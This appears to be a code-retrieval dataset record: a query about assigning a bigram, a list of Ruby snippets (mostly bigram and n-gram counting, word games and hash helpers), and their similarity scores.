"def most_frequent_bigram(str)\n bigrams_hash = biagram_hash(str)\n bigrams_hash.key(bigrams_hash.values.max)\nend",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n\n str.each_char.with_index do |char, i|\n if i != str.length - 1\n bigram = char + str[i + 1]\n end\n hash[bigram] += 1\n end\n most_frequent = hash.values.max\n hash.each { |k, v| return k if v == most_frequent}\n\nend",
"def +(bleu)\n\t\tthrow \"ngram size mismatch!\" if @ngram != bleu.ngram\n\n\t\tnewnc = []\n\t\tnewtc = []\n\t\t(1..@ngram).each{|n|\n\t\t\tnewnc[n] = @ngram_clips[n] + bleu.ngram_clips[n]\n\t\t\tnewtc[n] = @tcount[n] + bleu.tcount[n]\n\t\t}\n\t\t\n\t\tv = nil\n\t\tif @verbose > bleu.verbose\n\t\t\tv=@verbose\n\t\telse\n\t\t\tv=bleu.verbose\n\t\tend\n\n\t\tBLEU.new(nil, [newnc, newtc, @best_match_lengths + bleu.best_match_lengths, @ngram,v])\n\tend",
"def pangram?\n return @hist.size == 26\n end",
"def build_char_frequency_table(phrase)\n table = Array.new(26, 0)\n\n phrase.each_char do |char|\n x = get_char_number(char)\n if x != -1\n table[x] += 1\n end\n end\n\n table\nend",
"def most_frequent_bigram(str)\n counter = Hash.new(0)\n (0...str.length-1).each { |i| counter[str[i] + str[i+1]] += 1 }\n sorted = counter.sort_by { |k, v| v }\n sorted[-1][0]\nend",
"def increment_bucket(bucket)\n (bucket + 1) % table.length\n end",
"def genbank\n chars = 60\n lines = (length / chars.to_f).ceil\n width = length.to_s.length\n\n s = ''\n (1..lines).each do |i|\n s << \"%#{width}d\" % (chars * (i - 1) + 1)\n s << ' '\n s << to_s[chars * (i - 1), chars].scan(/\\w{1,10}/).join(' ')\n s << \"\\n\"\n end\n s\n end",
"def add_replicates\n\n #create path variable\n path = File.join(\"/home/jarvis\",\"test_app\",\"extra_scripts\")\n\n files = Dir[\"#{path}/*.gpr\"]\n dummynames = Array.new\n dummyTSI = Array.new\n\n files.each_with_index do |file, i|\n dummynames[i], dummyTSI[i] = readGpr(file)\n end \n\n tsi_container = dummyTSI.transpose\n tsi_container.map! {|e| e.map! {|f| f < 0? 0 : f}}\n tsi_container.map! {|e| e.inject(:+)/e.size}\n\n names_container = dummynames[0]\n\n \n \n puts tsi_container.to_s\n puts names_container.to_s\n\n puts tsi_container.size\n puts names_container.size\n\n end",
"def test_add100\n\n # make new file and fill with data\n\t\tfill_file(100)\n\t\t \t\n \tfb=Fastabin.new(TEST_FILE,'r') \t \t\n assert_equal(100,fb.count)\n fb.close\n \t\t\n end",
"def increment_playcount(path)\n # sometimes files don't end up in the database, add them when played\n self.new_file(path)\n @files.filter(:path => path).update(:playcount => Sequel.expr(1) + :playcount)\n end",
"def most_frequent_bigram(str)\n bigrams = Hash.new(0)\n (0...str.length-1).each{|i| bigrams[ str[i..i+1] ] += 1}\n max = bigrams.first[0] # Hash#first returns first key value pair in an array\n bigrams.each {|key,val| max = key if val > bigrams[max]}\n # bigrams.sort_by{|b, v| v}.last[0]\n max\nend",
"def good_bigram?(word)\n return false if REJECT_BIGRAMS.include?(word)\n return false if word.size < 2\n true\n end",
"def upgrade_RAM!(ram_in_GB)\n upgrade_item_price = _item_price_in_category(\"ram\", ram_in_GB)\n _order_upgrade_item!(upgrade_item_price) if upgrade_item_price\n nil != upgrade_item_price\n end",
"def to_h\n words = {}\n @table.each do |words, bigram|\n words[words] = bigram.rank\n end\n words\n end",
"def try_another_size(size)\n half_size = remaining / 2 - 1\n append_size = have_size?(half_size) ? half_size : largest_sized_bucket\n\n if append_word(append_size)\n add_words_starting_size(remaining - 1)\n elsif size > 1\n add_words_starting_size(size - 1)\n end\n end",
"def generate_counts(data)\n counts = {}\n data.each do |line|\n unigram = nil\n bigram = nil\n trigram = nil\n\n # prepend buffering ghost values so we can represent trigrams of the first word\n tokens = line.split(' ')\n\n # take a sliding window of the entire line, generating grams as we go\n (1..(tokens.size-1)).to_a.each do |i|\n unigram = tokens[i..i]\n bigram = tokens[i-1..i]\n trigram = tokens[i-2..i]\n\n counts.store(unigram, counts.fetch(unigram, 0) + 1)\n counts.store(bigram, counts.fetch(bigram, 0) + 1)\n counts.store(trigram, counts.fetch(trigram, 0) + 1)\n end\n end\n counts\nend",
"def add_string(string) \n unless @strings.include? string\n @strings[string] = self.strtab.num_bytes\n self.strtab << BinData::Stringz(string)\n end\n @strings[string]\n end",
"def prefix_encode(column)\n result = []\n encoded_val = false\n oc_count = 0\n column[\"av\"].each_with_index do |v, i|\n if i == 0\n result.push(v)\n oc_count = oc_count + 1\n elsif v == 0\n oc_count = oc_count + 1\n else\n result.push(v)\n end\n end\n column[\"av\"] = result\n column[\"oc_count\"] = oc_count\nend",
"def most_frequent_bigram(str)\n most_freq = \"\"\n highest_freq = 0\n bigram_hash = Hash.new(0)\n len = str.length\n (0...len-1).each { |idx| bigram_hash[str[idx..idx+1]] += 1 }\n bigram_hash.each do |k, v| \n if v > highest_freq\n most_freq = k \n highest_freq = v\n end\n end\n most_freq\nend",
"def repeats\n @total_letters - @hist.size\n end",
"def table_size_for(entry_count); end",
"def mb_count()\n each_char.map{|c| c.bytesize == 1 ? 1 : 2}.reduce(0, &:+)\n end",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n str.each_char.with_index do |char, idx|\n hash[str[idx..idx+1]] += 1\n end\n max = 0\n max_bigram = \"\"\n hash.each_pair do |key, value|\n if value > max\n max_bigram = key\n max = value\n end\n end\n return max_bigram\nend",
"def place_file_in_buckets(file)\n (0..@band_settings.bands).each do |band|\n @table.add_item(\n file, \n band_hash(file.signature_vector, band)\n )\n end\n end",
"def add_word(word)\n chars = word.chars\n current = @root\n\n chars.each do |c|\n current = add_character(c, current)\n current.word_count += 1\n end\n current.is_word = true\n end",
"def add(primary_key, fields, analyzers, suffix_array_writer)\n base_offset = @io.pos\n write_header(primary_key, fields)\n fields.each_with_index {|field,index|\n data = field || ''\n suffix_offset = store_field(data)\n suffix_array_writer.append_suffixes(analyzers[index], data, suffix_offset, base_offset, index)\n } \n write_footer((@io.pos-base_offset)+5)\n end",
"def has_gram?(gram)\n @frequencies.has_key?(gram)\n end",
"def include_letter(word, letter)\n index = 0 \n if @letter_bank.include?(letter) \n puts \"You already tried this letter\"\n else \n word.each_char do |l|\n if l == letter\n @blanks[index] = letter\n end \n index += 1\n end \n @guess_count -= 1 \n @letter_bank << letter\n end \n puts \"You have #{guess_count} guesses left\"\n p @blanks\n end",
"def verb_count\n return self[:verbs_count] if self[:verbs_count]\n self[:verbs_count] = self.verb_coding_frame_microroles.pluck(:verb_id).uniq.size\n save\n self[:verbs_count]\n end"
] | [
"0.6841609",
"0.66230047",
"0.6436192",
"0.60747945",
"0.57095593",
"0.56737536",
"0.55105084",
"0.53605306",
"0.53107405",
"0.5254298",
"0.5250469",
"0.52405584",
"0.52169746",
"0.52101177",
"0.5183813",
"0.51052535",
"0.5077029",
"0.50676984",
"0.50429875",
"0.50318074",
"0.5027517",
"0.5025446",
"0.50207347",
"0.4927599",
"0.49189326",
"0.49045843",
"0.48966154",
"0.48892397",
"0.4877156",
"0.48567405",
"0.48483798",
"0.48338795",
"0.48166376",
"0.47974727",
"0.478554",
"0.475954",
"0.47589567",
"0.4747503",
"0.47445056",
"0.47394952",
"0.47254702",
"0.4714793",
"0.47068623",
"0.4701087",
"0.47006047",
"0.46993408",
"0.46961224",
"0.46952912",
"0.46880323",
"0.4685968",
"0.4684637",
"0.46767816",
"0.46765018",
"0.46735078",
"0.46550938",
"0.46423197",
"0.46416205",
"0.46394962",
"0.46368167",
"0.4635701",
"0.4634195",
"0.4629643",
"0.4627336",
"0.46128336",
"0.461053",
"0.45814922",
"0.45781085",
"0.45727602",
"0.45703322",
"0.4567235",
"0.4565893",
"0.45579043",
"0.45503125",
"0.45449522",
"0.45322257",
"0.45320636",
"0.4530291",
"0.4529355",
"0.45232517",
"0.45172805",
"0.45107335",
"0.45099887",
"0.45047835",
"0.44883737",
"0.44707954",
"0.44675767",
"0.4464896",
"0.44573477",
"0.44554612",
"0.44543335",
"0.44452474",
"0.4441763",
"0.4412619",
"0.44056663",
"0.4404279",
"0.44027483",
"0.43961474",
"0.43952462",
"0.43890828",
"0.43845356"
] | 0.6372739 | 3 |
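Most of the negatives in the row above are variants of the same `most_frequent_bigram` exercise, several of which carry off-by-one or nil-key defects. For reference, a minimal correct sketch of the pattern (the method name comes from the snippets themselves; it assumes the input has at least two characters):

def most_frequent_bigram(str)
  counts = Hash.new(0)
  # slide a two-character window across the string, stopping one short of the end
  (0...str.length - 1).each { |i| counts[str[i, 2]] += 1 }
  # max_by yields [bigram, count] pairs; take the bigram with the largest count
  counts.max_by { |_bigram, count| count }.first
end

most_frequent_bigram("thethegram") # => "th" (ties resolve to the first bigram seen)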
Assign bigram. def []=(word1, word2) | def list
@table.keys
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def initialize word1, word2\n \t@word1 = word1\n \t@word2 = word2\n end",
"def adv\n @words1 = Word.all.sample(1)[0].word\n @words2 = Word.all.sample(1)[0].word\n end",
"def initialize word \n @word = word\n @guesses = ''\n @wrong_guesses = ''\n end",
"def populate(words)\n # Create an array of words and normailze it: we delete all cr chars (\\r) and put all letters downcase\n words = words.downcase.delete(\"\\r\").split(\"\\n\")\n # The anagram words contain the same letters, so we can create an hash where the key is a common index,\n # and the value is an array of words with the same key\n self.words_hash = words.each_with_object(Hash.new []) do |word,hash|\n hash[create_index(word)] += [word]\n end\n end",
"def initialize(word)\r\n\t\t@word = word.split(\"\")\r\n\t\t@guesses = @word.length * 2\r\n\t\t@underscore_array = @word.map {|x| \"_\" }\r\n\t\t@underscore = @underscore_array.join(\" \")\r\n\t\t@guessed_array = []\r\n\tend",
"def matching_bigrams(word1)\n list = @index[word1]\n list.map{ |word2| @table[[word1,word2]] }\n end",
"def initialize()\n @word = ''\n @guesses = ''\n @wrong_guesses = ''\n end",
"def addtoB(title)\n\t#title = \"let's see what this is doing\"\n\tstops = [\" a \", \" an \", \" and \", \" by \", \" for \", \" from \", \" in \", \" of \", \" on \", \" or \", \" out \", \" the \", \" to \", \" width \"] # list of stop words\n\tfor word in stops do # go through the stop words: if they exist in the sentence, we will...\n\t\t\ttitle = title.gsub(word, \" \") # changes word to NOTHING! Well, a space I guess. but still.\n\t\tend\n\n\ttitle_words = title.split(\" \") # splits title into various words\n\n\twhile (title_words.length > 1)\n\t\tfirst_word = title_words[0] # saves the first word to title bigram\n\t\tnext_wrd = title_words[1] # the next word in the title is the one we want to add\n\t\ttitle_words = title_words[1..-1] # chops off the first word and proceeds through\n\n\t\tif ($bigrams.has_key?(first_word)) # if we already have a key, we don't need a new hash\n\t\t\t# do nothing\n\t\telse\n\t\t\t$bigrams[first_word] = Hash.new # if word hasn't been encountered before, give it a new hash\n\t\tend\n\t\t\t\tif ($bigrams[first_word].has_key?(next_wrd)) # if the next word exists for the current word...\n\t\t\t\t\t$bigrams[first_word][next_wrd] = $bigrams[first_word][next_wrd] + 1 # then all we're doing is incrementing the count for that word by one.\n\t\t\t\telse\n\t\t\t\t$bigrams[first_word].merge!(next_wrd => 1) # otherwise, we will set the count of that word to one.\n\t\t\tend\n\t\tend\n\tend",
"def initialize(word)\n @correct_word_array = word.upcase.split(//)\n @letters_guessed_array = Array.new(word.length,\"__\")\n end",
"def looper(word1, word2)\n\t\tputs word1\n\t\t@word1 = word1.split(\"\") \n\t\t@word2 = word2.split(\"\")\n\n\t\tuntil @word1 == @word2 do \n\n\t\t\t@word1.each_with_index do |let, index|\n\t\t\t\tif let == @word2[index]\n\t\t\t\telse \n\t\t\t\t\ttemp = @word1.clone\n\t\t\t\t\ttemp[index] = @word2[index]\n\t\t\t\t\ttemp = temp.join(\"\")\n\t\t\t\t\tif @dictionary.exists?(temp) \n\t\t\t\t\t\tputs temp\n\t\t\t\t\t\ttemp = temp.split(\"\")\n\t\t\t\t\t\t@word1=temp\n\t\t\t\t\tend\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\tend",
"def fill_word(word_guess)\n\t\tword_guess_arr = @word_guess.scan\n\t\t\n\n\tend",
"def +(other_word)\n CombinedNoun.new([word, other_word])\n end",
"def initialize(word)\n @word = word\n @guesses = ''\n @wrong_guesses = ''\n end",
"def initialize(word)\n @word = word\n @guesses = ''\n @wrong_guesses = ''\n end",
"def initialize(word)\n @word = word\n @guesses = ''\n @wrong_guesses = ''\n end",
"def initialize(word)\n @word = word\n @guesses = ''\n @wrong_guesses = ''\n end",
"def initialize(word)\n @word = word\n @guesses=''\n @wrong_guesses=''\n @word_with_guesses=''\n @check_win_or_lose=''\n for i in 0..word.length-1\n @word_with_guesses[i]='-'\n end\n end",
"def initialize(word)\n @word = word\n @word_array = @word.chars\n @length = @word.length\n @blanks = []\n @guess_num = 0\n @word_array.each do |word|\n @blanks << \"_ \"\n end\n end",
"def add(word1, word2, file=nil)\n key = [word1,word2]\n if @table.key?(key)\n\t @table[key].file!(file) if file\n else\n bigram = Bigram.new(word1, word2)\n @table[key] = bigram\n\t @table[key].file!(file)\n @index[word1] << word2\n end\n end",
"def initialize(word)\n @word = word\n @guesses = ''\n @wrong_guesses = ''\n self\n end",
"def initialize(word)\n @word = word\n @guesses = \"\"\n @wrong_guesses = \"\"\n end",
"def initialize(word)\n @word = word\n @guesses = \"\"\n @wrong_guesses = \"\"\n end",
"def +(words_arr)\n @words = @words | words_arr\n\n self\n end",
"def construct(w)\n @word = \"~#{w}\" # Assimilate!\n @length = @word.length - 1 # Do not count the ~.\n @back = Array.new\n @back << 0 \n @back << 0\n s = 0\n (2..@length).each do |i|\n s = step(s,@word[i - 1])\n @back << s\n end\n end",
"def word=(word)\n add_weight :count, :letter, word.length\n add_weight :first, :letter, word[0]\n (word.length - 1).times { |l| add_weight :next, word[l], word[l.succ] }\n add_weight :last, word[-2], word[-1]\n end",
"def setguessword\n\t\t@starting_word.each_index do |index|\n\t\t\t@guessing_word[index]=\"_ \"\n\t\tend\n\t\treturn @guessing_word\n\tend",
"def make_word_array\n @word_array = @word.chars.to_a\n end",
"def initialize()\n @word = get_random_word\n @guesses = ''\n @wrong_guesses = ''\n end",
"def words\n @phrase = @phrase.split(' ')\n end",
"def initialize\n @words = (KEYWORDS + OTHERS).map(&:downcase)\n end",
"def initialize(word = nil, hidden_word = nil)\r\n @word = word.gsub(\"\\n\", \"\").split('') unless word == nil\r\n @hidden_word = hidden_word.split(' ') unless word == nil\r\n @word ||= Hangman::Dictionary.generate_word.gsub(\"\\n\", \"\").split('')\r\n @hidden_word ||= @word.map {|letter| letter = \" _ \"}\r\n end",
"def bigramate(word)\n (0..(word.length - 2)).map { |i| word.slice(i, 2) }\n end",
"def add(word1, word2, file)\n if table.key?([word1, word2])\n bigram = table[[word1,word2]]\n else\n bigram = Bigram.new(word1, word2)\n @table[[word1,word2]] = bigram\n @index[word1][word2] = bigram\n end\n bigram.found_in_file(file)\n end",
"def setsecretword word\r\n\t\t @secretword = word\r\n\t\t templ = createtemplate\r\n\t\t\t\t\tword_templ = templ.gsub(\"[\",\"\").gsub(\"]\",\"\")\r\n\t\t\t\t\ti=0\r\n\t\t\t\t\tsec_word_array=@secretword.chars\r\n\t\t\t\t\twhile i < sec_word_array.length do\r\n\t\t\t\t\t\tif sec_word_array[i] == \" \"\r\n\t\t\t\t\t @resulta[i] = \" \"\r\n\t\t\t\t\t else\r\n\t\t\t\t\t \t@resulta[i] = \"_\"\r\n\t\t\t\t end\r\n\t\t\t\t i+=1\r\n\t\t\t\t end\r\n\t\t end",
"def initialize_grid(word1, word2)\n\tgrid = []\n\n\t# build some top rows and columns with 0 to make things easier\n\tfor i in 0..word2.size + 1\n\t\tgrid << [0] * (word1.size + 1)\n\tend\n\n\tgrid\nend",
"def add_word(word)\n sym = word.to_sym\n wdup = word.dup\n for i in 0...word.length\n wdup[i] = 0\n @steps[wdup] << sym\n wdup[i] = word[i]\n end\n @words[word] = sym # for allow_shorter and each_word\n end",
"def initialize(word)\n @word = word.downcase\n @guesses = ''\n @wrong_guesses = ''\n end",
"def words\n @words_array = @phrase.split(' ')\n end",
"def insertions\n new_words = []\n @words.each do |word|\n @word = word || '' \n (length + 1).times do |i|\n ('a'..'z').each { |c| new_words << \"#{@word[0...i]}#{c}#{@word[i..-1]}\" }\n end\n end\n new_words\n end",
"def set_guess\n @guess = Array.new(@word.length, '*')\n end",
"def initialize(word)\r\n\r\n\t\t@word_array = word.split('')\r\n\t\t@board_array = []\r\n\t\t@guesses = []\r\n\r\n\t\t#Set board\r\n\t\t@word_array.length.times do\r\n\t\t\t@board_array << \"_\"\r\n\t\tend\r\n\r\n\t\t@num_of_guesses = 0\r\n\t\t@is_over = false\r\n\r\n\tend",
"def initialize(word)\n @guesses = ''\n @wrong_guesses = ''\n @word = word.downcase\n end",
"def initialize\n\t\t@word = [\"buffalo\", \"llama\", \"kangaroo\", \"elephant\", \"aardvark\", \"orangutan\", \"hyena\"]\n\t\t@current_state = []\n\t\t@guess_array = []\n\tend",
"def initialize(player_1_word)\n @word_to_guess = player_1_word.split('')\n @number_guesses_left = @word_to_guess.length\n @letters_tried=[]\n end",
"def word=(_arg0); end",
"def initialize(word)\n @word = word.downcase\n @guesses = ''\n @wrong_guesses = ''\n @word_with_guesses = \" \"\n for i in 0...@word.length\n @word_with_guesses[i] = \"-\"\n end\n @check_win_or_lose = :play\n\n end",
"def initialize word, frequency = 1\n\t\t\t@word = word\n\t\t\t@frequency = frequency\n\t\tend",
"def scramble(word)\n\tfor i in 0..100\n\t\tone = rand(word.length-1)\n\t\ttwo = rand(word.length-1)\n\t\tword[one], word[two] = word[two], word[one]\n\tend\nend",
"def add word\n super word.clone\n end",
"def initialize words\n @word_list = words\n end",
"def add_word word #Function shovels individual strings into the dictionary array\n @dictionary << word\n end",
"def combine_anagrams(words)\r\n\r\n h=Hash.new([])\r\n words.map {|w| key=w.downcase.split('').sort.join; h[key]+=[w]}\r\n h.values\r\n \r\nend",
"def initialize(player1, player2, secret_word)\n @player1 = player1\n @player2 = player2\n @secret_word = secret_word\n\t\t# Code: Split the string into characters\n\t\t# Output: array of characters (secret_word_arr) \n @secret_word_arr = secret_word.chars\n \t@word_length = @secret_word_arr.length\n \t@guess_count = 0\n @is_over = false\n # @guess = nil\n @guesses = []\n\tend",
"def setup\n @board = []\n @words = 1\n for i in 0...@phrase.length\n if @phrase[i] == \" \"\n @board << \" \"\n @words += 1\n else\n @board << \"_\"\n end\n end\n @phraseletters = @phrase.length + 1 - words\n @remaining = phraseletters\n @board = @board.join\n end",
"def initialize(word)\n @word = word\n @guesses = ''\n @wrong_guesses = ''\n @word_with_guesses = ''\n @wrong_word_with_guesses = ''\n @check_win_or_lose\n i = 0\n while i < @word.length do\n @word_with_guesses << '-'\n i=i+1\n end\n end",
"def initialize(word)\n\t\t@word = word\n\t\t@guesses = word.length\n\t\t@game_over = false\n\t\t@letters = []\n\tend",
"def addword(word)\n if @graph.words[word].nil? then\n @graph.words[word] = {}\n end\n end",
"def add_word(word)\n \n end",
"def combine_anagrams(words)\r\n hash = Hash.new([])\r\n anagrams = []\r\n words.each do |word|\r\n keyword = word.downcase.chars.sort.join\r\n hash[keyword] += [word]\r\n end\r\n hash.each_value do |words|\r\n anagrams += [words]\r\n end\r\n return anagrams\r\nend",
"def blank_word(word)\n @guessword2 = word.gsub(/[a-z]/, '_').split('')\n end",
"def add(word)\n change_wordlist(@words + [ Word.new(word) ] )\n end",
"def given_word(word)\n @guessword = word.to_s.split('')\n end",
"def add_word(word)\r\n \r\n end",
"def initialize(text)\n @words = text.split(\" \")\n @next = 0\n end",
"def create_codeword_matches(words)\n set = Set.new\n\t\twords.each do |word|\n\t\t\tset.add(word) if word.length == @codeword.length \n\t\tend\n set\n\tend",
"def set_game_variables\n\t\tword = @dictionary.random_word\n\t\t@answer_array = word.split('')\n\t\t@blank_word_array = []\n\t\tword.length.times do \n\t\t\t@blank_word_array << \"_\"\n\t\tend\n\t\t@guess_counter = 6\n\t\t@incorrect_array = []\n\tend",
"def initialize(target_word)\n\t\t@target_word = target_word\n\t\t@guess_limit = target_word.length*2\n\t\t@guess_count = 0\n\t\t@is_over = false\n\t\t@win = false\n\t\t@guess_history = []\n\t\t@feedback = []\n\t\ttarget_word.split('').each {|x| @feedback << [x, false]}\n\tend",
"def scramble_words(chars = WordChars)\n\t\tgsub(/(#{chars})(#{chars}+)(?=#{chars})/) { $1 + $2.randomize }\n\tend",
"def combine_anagrams(words) \r\n anagrams = words.inject(Hash.new()) do |r, word|\r\n key = word.downcase.chars.sort.join\r\n r[key] ||=[]\r\n r[key] << word\r\n r\r\n end\r\n anagrams.values\r\nend",
"def initialize(word=WordGuesserGame.get_random_word, guesses = '',wrong_guesses='')\n @word = word\n @guesses = guesses\n @wrong_guesses = wrong_guesses\n end",
"def combine_anagrams(words)\r\n\tswords = Array.new\r\n\tnoDups = Array.new\r\n\tgroupWords = Array.new\r\n\tanagrams = Array.new\r\n\twords.each {|word| swords << word.downcase.chars.sort.join}\r\n\tswords.each{|word| noDups << word unless !noDups.index(word).nil? }\r\n\tnoDups.each do|tword|\r\n\t\t\t\t\t\r\n\t\t\t\t\tgroupWords = Array.new\r\n\t\t\t\t\twords.each {|word| groupWords << word unless word.downcase.chars.sort.join != tword}\r\n\t\t\t\t\tanagrams << groupWords\r\n\t\t\t\tend\r\n\t\t\t\t\r\n\treturn anagrams\r\nend",
"def add_word(word)\n if word.length == 0\n @isend = true\n else\n @childs[word[0]] ||= WordDictionary.new\n @childs[word[0]].add_word(word[1..-1])\n end\n nil\n end",
"def make_array\n @phrase_string.downcase.split(WORD_SPLIT).reject(&:empty?)\n end",
"def initialize(*arguments)\n @word, *@tags = *arguments.flatten\n end",
"def initialize(word)\n # Make the word lowercase\n @word = word.downcase\n @guesses = ''\n @wrong_guesses = ''\n @word_with_guesses = ''\n end",
"def create_index1(word)\n word.chars.sort!.join\n end",
"def build(words)\n words.each do |word|\n self.add(word)\n end\n end",
"def combine_anagrams(words)\n\th = Hash.new{|hash, key| hash[key] = Array.new;}\n\twords.each do |word| h[word.downcase.split(//).sort.join] << word end\n\th.values \nend",
"def add(word)\n end",
"def morph_words\n words = @query.split(/[^a-zA-Z0-9]/)\n morphed_words = words.map{|word| [word,Text::Metaphone.double_metaphone(word)]}\n morphed_words\n end",
"def anagrams\n word.anagram.words.pluck(:text) - [word.text]\n end",
"def initialize( first_range, second_range, word_counter )\n @word_map = Hash.new\n @ignore_database = Array.new\n @word_combinations_database = Array.new\n @word_count = word_counter\n @first_range = first_range\n @second_range = second_range\n end",
"def initialize(word)\n @word=word\n end",
"def initialize(a, b)\n\t\t\t@a_words = []\n\t\t\t@b_words = []\n\t\t\t@differences = []\n\t\t\n\t\t\trun_diff(a, b)\n\t\tend",
"def second_anagram?(word1, word2)\n w1_copy = word1.dup\n w2_copy = word2.dup\n w1_copy.each_char do |ch1|\n w2_copy.each_char do |ch2|\n if ch1 == ch2\n w1_copy[w1_copy.index(ch1)] = \"\"\n w2_copy[w2_copy.index(ch2)] = \"\"\n end\n end\n end\n w1_copy.empty? && w2_copy.empty?\nend",
"def initialize(word = dictionary_word, progress = nil, bad_guesses = [])\n word = word.join(\"\") if word.is_a? Array\n @value = word.upcase.split(\"\")\n progress.nil? ? @progress = word.upcase.gsub(/\\w/,\"_\").split(\"\") : @progress = progress.join(\"\").upcase.split(\"\")\n @bad_guesses = bad_guesses.join(\"\").upcase.split(\"\")\n end",
"def array_word\n p @arrayed_word = @secret_word.split(\"\")\n end",
"def add(word)\n @words[@words.size] = word\n end",
"def build(text)\r\n # parse words and then builds weighted links\r\n arr = []\r\n i = 0\r\n while word = parse_string\r\n arr << word\r\n if i == 0\r\n add_first_word()\r\n else\r\n add_word()\r\n end\r\n i = 0 if trim_space == true\r\n end\r\n \r\n end",
"def word_substituter (tweet=\"some thing need to be shorten, like two too\")\n tweet= tweet.strip\n temp_a = tweet.split(\" \")\n words_can_b_sh = dictionary.keys\n #puts words_can_b_sh\n temp = \"\"\n# puts temp_a\n temp_a.each do |word|\n if words_can_b_sh.include?(word.downcase)\n temp << dictionary[word.downcase]\n else\n temp << word\n end\n temp << \" \"\n end\n temp.strip\nend",
"def add(word, w)\n if word != \"\" \n cur = self\n word.downcase.each_char do |character|\n modified_char = @@vowels.include?(character) ? '*' : character\n cur.kids[modified_char] = SpellingTrie.new if not cur.kids.has_key? modified_char\n cur = cur.kids[modified_char]\n end\n cur.words_here.add(w)\n end\n end",
"def build_chain\n i = distance(@word1, @word2) \n k = 0\n list = Array.new\n dict_list = make_list\n while i > 0\n j = 0 \n while j < dict_list.length\n #get a increasing edit distance from @word1 and a decreasing edit distance from wor2\n if (distance(@word1, dict_list[j]) <= k && distance(@word2, dict_list[j]) <= i)\n list.push dict_list[j]\n end\n j = j + 1\n end\n k = k + 1\n i = i - 1\n end\n list.push(@word2)\n end",
"def replacements\n new_words = []\n @words.each do |word|\n @word = word || '' \n length.times do |i|\n ('a'..'z').each { |c| new_words << \"#{@word[0...i]}#{c}#{@word[i+1..-1]}\" }\n end\n end\n new_words\n end",
"def combine_anagrams_method2(words)\n\ttemp1 = Array.new\n\ttemp1 = words.clone\t# making a deep copy of the input \n\tanagram = Array.new\t\n\ti = 0\n\twhile i < temp1.length\t\t\t\n\t\tcount = 0 # count the number of anagrams of a particular string say \"cars\"\n\t\tfor j in i+1..(temp1.length - 1)\n\t\t\tif temp1[i].downcase.chars.sort.join == temp1[j].downcase.chars.sort.join \n\t\t\t\tcount = count + 1\n\t\t\t\ttemp1[j],temp1[i+count] = temp1[i+count],temp1[j] # get all the anagrams to one place by swapping\n\t\t\tend\n\t\tend\n\t\tanagram.push([temp1[i..i+count]]) # pushing the array of anagrams into anagram array say [\"cars\", \"racs\", \"scar\"]\n\t\ti = i + count + 1\n\tend\n\t# printing each group\n\tfor i in 0..anagram.length-1\n\t\tprint \"anagram[\" + i.to_s + \"]: \" \n\t\tputs anagram[i]\n\tend\t\nend",
"def initialize(word)\n @word = word\n end",
"def initialize(word)\n\t\t@word = word\n\t\t@guesses = word.length\n\t\t# Initialize a instance variable with empty hash.\n\t\t@guessed_words = {}\n\t\t# Initialize the game_end to boolean false \n\t\t@game_end = false\n\t\t# Index is used to replace the dashes with the correct guess.\n\t\t@index = 0\n\t\t# Initialize the hidden word with dashes instead of alphabets.\n\t\t@hidden_word = word.tr(word,\"-\")\n\tend",
"def scramble_words(words)\n first_word = words[0]\n last_word = words[-1]\n alphabetically = words[1, (words.size - 2)].chars.sort\n alphabetically.unshift(first_word).push(last_word).join\nend",
"def combine_anagrams(words=[])\n return [] if words.empty?\n hash = {}\n words.each do |word|\n anagram = word.downcase.split(\"\").sort.join(\"\")\n if hash[anagram].nil? then\n hash[anagram]=[word]\n else\n hash[anagram].push(word)\n end\n end\n return hash.values\nend",
"def scream(word)\n words = words + \"!!!!\"\nend",
"def init_word_board\r\n\t\t if @resulta.size == 0\r\n\t\t\t\t\t\t\treadwordfile(@filename)\r\n\t\t\t\t\t\t\t@descr = @phrases\r\n\t\t\t\t\t\t\tsetsecretword(gensecretword)\r\n\t\t\t\t\t\tend\r\n\t\t end",
"def initialize(word, image)\n @word = word\n @correct_guesses = Array.new(word.game_word.length)\n @dashes = Array.new(word.game_word.length, \"-\")\n @guesses = []\n @counter = 0\n @image = image\n end"
] | [
"0.67964894",
"0.6368523",
"0.63531435",
"0.6240786",
"0.62122756",
"0.61751467",
"0.6128019",
"0.61179775",
"0.61072564",
"0.6092386",
"0.60768235",
"0.60227937",
"0.5985246",
"0.5985246",
"0.5985246",
"0.5985246",
"0.5979332",
"0.5971955",
"0.5959876",
"0.59452933",
"0.5934398",
"0.5934398",
"0.5927344",
"0.5916715",
"0.58955705",
"0.5891825",
"0.5885614",
"0.58798677",
"0.58784336",
"0.58639574",
"0.5831348",
"0.5826584",
"0.5821501",
"0.57875544",
"0.57865864",
"0.5780483",
"0.5768592",
"0.57659537",
"0.5764362",
"0.57483613",
"0.57450145",
"0.5724747",
"0.5724064",
"0.5707146",
"0.57037157",
"0.56901395",
"0.5689935",
"0.56602186",
"0.565793",
"0.5653968",
"0.5647398",
"0.5645645",
"0.5641112",
"0.56395084",
"0.56227106",
"0.56091404",
"0.5598798",
"0.55960727",
"0.55672604",
"0.55671",
"0.5566614",
"0.55631745",
"0.5552575",
"0.55445045",
"0.55442214",
"0.5537941",
"0.5537933",
"0.5525732",
"0.5523491",
"0.5521033",
"0.5504338",
"0.5499134",
"0.5497028",
"0.549191",
"0.5491736",
"0.5486025",
"0.54834795",
"0.5474965",
"0.5467952",
"0.546556",
"0.5454294",
"0.5451002",
"0.5443145",
"0.5442572",
"0.54285896",
"0.54263437",
"0.54240465",
"0.5418156",
"0.54146373",
"0.5411611",
"0.5404517",
"0.5398184",
"0.5392387",
"0.53920835",
"0.5385913",
"0.5380448",
"0.5379579",
"0.53758585",
"0.53735083",
"0.53680694",
"0.53665406"
] | 0.0 | -1 |
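The query above asks for a bigram assignment via `[]=`, but no retrieved document matched (document_score 0.0, rank -1). A minimal sketch of what such an assignment could look like, modeled on the `add(word1, word2, ...)` snippets among the negatives; the `Bigram` class and the `@table`/`@index` instance variables are assumptions borrowed from those snippets, not a confirmed API:

# Assumes @table = {} and @index = Hash.new { |h, k| h[k] = [] }.
def []=(word1, word2)
  key = [word1, word2]
  # create the bigram on first assignment, reuse it afterwards
  @table[key] ||= Bigram.new(word1, word2)
  # index second words under their first word for matching_bigrams-style lookups
  @index[word1] << word2 unless @index[word1].include?(word2)
end

# usage: the assignment form, e.g. bigrams["hello"] = "world"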
